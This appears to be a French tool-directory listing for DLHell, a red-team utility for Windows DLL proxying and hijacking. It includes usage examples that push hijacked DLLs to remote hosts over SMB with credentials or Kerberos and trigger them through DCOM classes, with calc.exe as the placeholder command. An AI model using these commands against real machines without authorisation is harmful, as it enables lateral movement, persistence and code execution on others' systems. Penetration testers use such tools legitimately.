Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/synacktiv/dlhell
Privilege EscalationPersistence MechanismsExploitationLateral MovementPost-ExploitationPayload Development
GitHubsynacktiv/dlhell

DLHell

Local & remote Windows DLL Proxying

Voir le dépôt
17222il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DLHell

DLHell effectue du proxying de DLL Windows DCOM local et distant.

Installation

Les paquets suivants sont requis (cela peut dépendre de votre distribution, l'exemple suivant est pour Debian 12) :

root@kitploit:~
sudo apt install -y g++-mingw-w64-x86-64-win32 binutils-mingw-w64-x86-64

Installer les dépendances pip :

root@kitploit:~
pip3 install -r requirements.txt

Démarrage rapide

La commande suivante détourne la bibliothèque netutils.dll sur l'hôte 10.137.0.48 à partir du fichier modèle template.tpe (bibliothèque de détournement en source C++) qui lance calc.exe. Les DLL originale et proxy seront placées dans le dossier program files/windows nt/accessories/ du partage C$ sur la cible distante.

Veuillez utiliser la syntaxe Impacket pour l'option -remote-target.

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -remote-lib 'windows/system32/netutils.dll' -remote-target 'program files/windows nt/accessories/test.dll' -target 'domain/user:password@ip'

L'authentification Kerberos peut également être utilisée :

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -k -target wks-02.vault-tech.com -progid WordPad.Document.1

Listez les CLSID et ProgID disponibles :

root@kitploit:~
DLHell.py -list

Utilisation

root@kitploit:~
 ____  _     _   _      _ _
|  _ \| |   | | | | ___| | |
| | | | |   | |_| |/ _ \ | |
| |_| | |___|  _  |  __/ | |
|____/|_____|_| |_|\___|_|_|

DLHell v1.0

usage: DLHell.py [-h] [-local-lib LOCAL_LIB] [-remote-lib REMOTE_LIB] [-local-target LOCAL_TARGET]
                 [-remote-target REMOTE_TARGET] [-target TARGET] [-clsid CLSID] [-progid PROGID] -t T -c C
                 [-u U] [-l] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
                 [-target-ip ip address] [-port [destination port]]

DLL Hell - DLL Proxifier/Hijacker

options:
  -h, --help            show this help message and exit
  -local-lib LOCAL_LIB  Path of the remote library on the local system, ex: version.dll
  -remote-lib REMOTE_LIB
                        Path of the library on the remote system, ex: windows/system32/version.dll. WARNING:
                        Will connect using SMB on C$ share. Admin rights needed. Requires -target
  -local-target LOCAL_TARGET
                        The new name of the local output proxyfied library
  -remote-target REMOTE_TARGET
                        The new name of the remote proxyfied library. WARNING: Will connect using SMB on C$
                        share. Admin rights needed. Requires -target
  -target TARGET        [[domain/]username[:password]@]<targetName or address>
  -clsid CLSID          CLSID of DCOM class to activate
  -progid PROGID        ProgID of DCOM class to activate
  -t T, -template T     Template file to use for lib generation
  -c C, -command C      Command to execute using hijacked lib
  -u U, -user U         Name of the user to hijack (used to put DLLs in localappdata folder)
  -l, -list             Lists vulnerable CLSID & ProgID for DCOM Hijacking

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
                        target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN)
                        specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as
                        target. This is useful when target is the NetBIOS name and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Proxying local de DLL

Pour la création de DLL locale, utilisez les options -local-lib (nom de la DLL proxy) et -local-target (DLL d'origine renommée) :

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -local-lib 'lib/netutils.dll' -local-target 'test.dll'

Proxying distant de DLL (privilèges administrateur requis) :

Pour le détournement de DLL distant, spécifiez les options -target, -remote-lib (nom de la DLL d'origine sur l'hôte distant) et -local-target (DLL d'origine renommée) :

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -remote-lib 'windows/system32/PROPSYS.dll' -remote-target 'windows/test.dll'

Proxying de DLL DCOM (privilèges administrateur requis)

Le proxying de DLL DCOM peut être exploité en utilisant les options -progid et -clsid. La liste des CLSID et ProgID disponibles est accessible avec la commande suivante :

root@kitploit:~
DLHell.py -list

Vous pouvez ajouter de nouveaux détournements au fichier dcom.json qui définit les chemins des bibliothèques vulnérables :

Ensuite, seul le ProgID ou le CLSID est requis pour :

  • Récupérer la DLL d'origine
  • Créer et compiler la bibliothèque de détournement
  • Téléverser les bibliothèques sur l'hôte distant
  • Activer la classe DCOM distante

Exemple pour le ProgID WordPad.Document.1 :

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -progid WordPad.Document.1

Exemple pour le CLSID 73FDDC80-AEA9-101A-98A7-00AA00374959 :

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -clsid 73FDDC80-AEA9-101A-98A7-00AA00374959
Télécharger l’outil